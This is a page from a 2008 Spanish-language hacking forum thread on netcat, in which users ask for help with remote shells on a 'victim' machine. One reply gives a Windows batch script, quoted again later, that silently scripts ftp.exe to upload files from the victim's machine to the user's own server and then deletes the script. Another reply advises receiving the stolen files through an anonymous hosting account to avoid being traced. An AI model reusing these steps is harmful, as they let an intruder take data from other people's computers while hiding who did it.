elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 ... 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 [46] 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 279,328 veces)
pascal88

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Jugando con netcat
« Respuesta #450 en: 21 Abril 2008, 19:37 pm »


8. Por último presionas en "OK"

Ufff... ahora que ya configuramos nuestro servidor FTP podemos hacer las transferencias de archivos... ¿como?... facil mi querido watson...

Desde tu shell crearemos un texto que nos permitirá ejecutar los comandos del FTP.

echo o >> ftp.txt
echo mi_ip >> ftp.txt
echo user >> ftp.txt     (Recuerda que lo vimos en el paso 1)
echo pass >> ftp.txt     (esto también lo vimos en el paso 3)
echo GET archivo >> ftp.txt
echo quit >> ftp.txt

El comando GET significa que le subirás un archivo y el comando PUT es porque le sacarás un archivo para ponerlo en tu pc. Puedes aplicar mas de uno como por ejemplo:


Ahora ejecutamos el FTP desde mi shell de la siguiente manera: ftp.exe -s:ftp.txt y bualá!...


Justamente despues de hacer eso, me pone que hay un error desconocido.
Quiza no lo ponga donde es, donde se pone eso, en la shell donde salen los datos de la victima o en la mia? es que no se que puede pasar!!! ayuda pleaseeee!!
En línea

marlon_agz


Desconectado Desconectado

Mensajes: 987


Encontre el origen de los Emos xD


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #451 en: 22 Abril 2008, 05:31 am »

aqui mismo :xD

http://www.vulnwatch.org/netcat/nc111nt.zip


salu2
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #452 en: 22 Abril 2008, 05:46 am »

Mejor busca tutos sobre tcp/ip y transferencias de datos, y sockets... eso es lo que manejas desde nc, nada más, por eso lo usan los administradores de redes.
En línea

OpenBSDFreeBSD
pascal88

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Jugando con netcat
« Respuesta #453 en: 22 Abril 2008, 20:23 pm »

Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??


Por favor, contestar!!

Gracias.
En línea

drzboii94

Desconectado Desconectado

Mensajes: 94



Ver Perfil
Re: Jugando con netcat
« Respuesta #454 en: 22 Abril 2008, 21:44 pm »

no entiendo cual archivo es que tengo que anadir  a .rrar
En línea

elmeister

Desconectado Desconectado

Mensajes: 43


Ver Perfil
Re: Jugando con netcat
« Respuesta #455 en: 22 Abril 2008, 22:07 pm »

Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??


Por favor, contestar!!

Gracias.

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código
  1. echo usuario>>script
  2. echo pass>>script
  3. echo ascii>>script
  4. echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script
  5. echo bye>>script
  6. start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul
  7. del script
  8.  

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #456 en: 22 Abril 2008, 22:16 pm »

drzboii94:
Primero quemarse la cabeza y despues si preguntar... apuesto a que no leiste ni medio...sentate, perde una o dos horas en leer, y no nos hagas perder el tiempo a nosotros por vos: se menciono mil veces que es nc.exe, renombrado, cambiado, lo que quieras, de todas formas no es cosa de geeks... yo programo mis popias versiones.

pascal88:
Si usas un dominio en iespana con tus datoos te expones demasiado. yo uso una, pero anonima, entonces el es el que accede, y sube archivos por el ftp de iespana, y yo los descargo como si fuera un usuario comun... jeje. el tema es que encriptes bien el usuario y pass del ftp... no los vayas a incluir en el fuente o un dump bastaria para verlos...
a demas usa php para que la capacidad de bajar algunos archivos sea solo con un pass...xd
se creativo...
En línea

OpenBSDFreeBSD
drzboii94

Desconectado Desconectado

Mensajes: 94



Ver Perfil
Re: Jugando con netcat
« Respuesta #457 en: 22 Abril 2008, 22:34 pm »

drzboii94:
Primero quemarse la cabeza y despues si preguntar... apuesto a que no leiste ni medio...sentate, perde una o dos horas en leer, y no nos hagas perder el tiempo a nosotros por vos: se menciono mil veces que es nc.exe, renombrado, cambiado, lo que quieras, de todas formas no es cosa de geeks... yo programo mis popias versiones.

pascal88:
Si usas un dominio en iespana con tus datoos te expones demasiado. yo uso una, pero anonima, entonces el es el que accede, y sube archivos por el ftp de iespana, y yo los descargo como si fuera un usuario comun... jeje. el tema es que encriptes bien el usuario y pass del ftp... no los vayas a incluir en el fuente o un dump bastaria para verlos...
a demas usa php para que la capacidad de bajar algunos archivos sea solo con un pass...xd
se creativo...

Lo ley entero pero lo que pasa es que mira lo que me sale despues que pongo
Citar
NC -VV -L -P 80

En línea

pascal88

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Jugando con netcat
« Respuesta #458 en: 22 Abril 2008, 23:46 pm »

Citar

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código
  1. echo usuario>>script
  2. echo pass>>script
  3. echo ascii>>script
  4. echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script
  5. echo bye>>script
  6. start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul
  7. del script
  8.  

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script


perdona que sea tan pesao hombre, pero es que veras, desde la consola de mi pc pongo eso tal cual, es decir, en usuario y en pass no pongo mis datos, lo pongo igual que viene en tu post. y me sube el archivo!, pero desde la shell de la "victima" no lo sube tio! que hago?

Una ayudita porfavoooooo!!!
grasiasss
En línea

vladimir_levin

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: Jugando con netcat
« Respuesta #459 en: 23 Abril 2008, 21:48 pm »

muy buen manual completisimo y chidisimo  ;D ;D
En línea

Páginas: 1 ... 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 [46] 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines